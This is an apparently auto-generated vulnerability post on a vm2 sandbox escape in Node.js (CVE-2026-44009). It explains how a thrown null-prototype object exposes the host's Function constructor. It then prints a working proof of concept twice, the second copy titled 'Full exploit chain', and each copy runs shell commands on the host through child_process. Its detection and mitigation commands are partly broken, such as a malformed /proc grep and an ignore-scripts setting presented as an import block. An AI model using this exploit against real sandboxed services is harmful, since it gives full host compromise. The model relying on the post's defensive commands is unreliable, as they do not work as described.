Listen to this Post
How the Vulnerability Works
The flaw exists in the `handleException` function, specifically in a hardening commit after GHSA-mpf8. When an exception is thrown from the sandbox that has a `null` prototype (__proto__: null), the de-serialization logic mishandles it. Instead of treating it as a plain sandbox object, the code incorrectly assumes the null-proto exception originates from the host side and should be proxied back. This allows an attacker to catch the exception inside the sandbox, gaining access to both the proxied (wrapped) and the unproxied (raw) versions of the object. By then attaching a function—such as the `inspect` method from Buffer.prototype—to the caught exception, the attacker can obtain a reference to the host’s raw `Function` constructor. With the raw Function, the sandbox can be completely bypassed to execute arbitrary system commands on the host machine. The following Proof-of-Concept (PoC) demonstrates the breakout:
const { VM } = require('vm2');
const vm = new VM();
console.log(vm.run(<code>const o = { __proto__: null };
try { throw o; } catch (e) {
e.f = Buffer.prototype.inspect;
const proc = e.f.constructor('return process')();
proc.mainModule.require('child_process').execSync('touch pwned');
}</code>));
(Source: SecAlerts CVE-2026-44009)
When executed, this code creates the file `pwned` on the host system, proving that code run inside the sandbox is not isolated.
DailyCVE Form
Platform: Node.js VM2
Version: <3.11.2
Vulnerability: Sandbox Breakout
Severity: Critical
Date: 2026-05-08
Prediction: 2026-05-09
What Undercode Say:
Analytics
Check installed version
npm list vm2 | grep vm2@
Monitor for attempts in real-time
grep -i "touch pwned" /proc//fd/1 2>/dev/null | awk '{print "PID:", $1, "->", $0}'
Count potential exploitation attempts
grep -c "const {VM} = require" /var/log/app/app.log
Exploit
// Full exploit chain
const { VM } = require('vm2');
const vm = new VM();
vm.run(<code>const o = { __proto__: null };
try { throw o; }
catch (e) {
e.f = Buffer.prototype.inspect;
const proc = e.f.constructor('return process')();
proc.mainModule.require('child_process').execSync('id > /tmp/owned');
}</code>);
Protection
Upgrade to the patched version npm install [email protected] Block vulnerable imports (alternative measure) npm config set ignore-scripts true
Impact
Attackers can achieve full Remote Code Execution (RCE), allowing arbitrary commands, file modifications, and complete compromise of the host system. The vulnerability affects all versions before 3.11.2, with a CVSS score of 10.0 (Critical). Sandboxes designed to safely run untrusted code provide zero isolation, and no other mitigations exist besides upgrading to the fixed version.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
